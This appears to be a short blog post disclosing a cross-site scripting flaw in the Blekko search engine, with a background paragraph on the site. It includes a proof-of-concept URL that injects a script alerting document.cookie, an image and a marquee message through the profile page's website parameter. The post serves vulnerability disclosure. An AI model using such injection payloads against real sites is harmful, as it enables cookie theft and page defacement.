Search This Blog

Powered by Blogger.

Blog Archive

Labels

blekko.com (spam free search engine) Vulnerable to XSS(cross site scripting)

A Hacker sony reported a new a XSS vulnerability found in blekko.com, one of web search engine. Blekko is a web search engine whose goal is to provide better search results than those offered by Google Search, by offering results culled from a set of 3 billion trusted websites and excluding material from such sites as content farms. The site, launched to the public on November 1, 2010, uses slashtags to provide results for common searches.

Screenshot:


Poc:
http://blekko.com/tag/profile?m=1&email=editpro%2540bk.ru&name=&desc=&website=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cimg%20src=%20http://www.tnr.com/sites/default/files/imagecache/thumbnail_landing/RomaniaFlag.jpg%20align=center%3E%3Cmarquee%20scrollamount=%223%22%3ESystem%20Error..well,%20joke,%20it%27s%20only%20xss..We%20can%20see%20Cross%20Site%20Scripting%20on%20the%20Blekko%20-%20web%20search%20engine.%20By%20Sony.%20http://st2tea.blogspot.com%3C/marquee%3E


source:
st2tea.blogspot.com
Share it:

Vulnerability

Web Application Vulnerability

XSS Vulnerability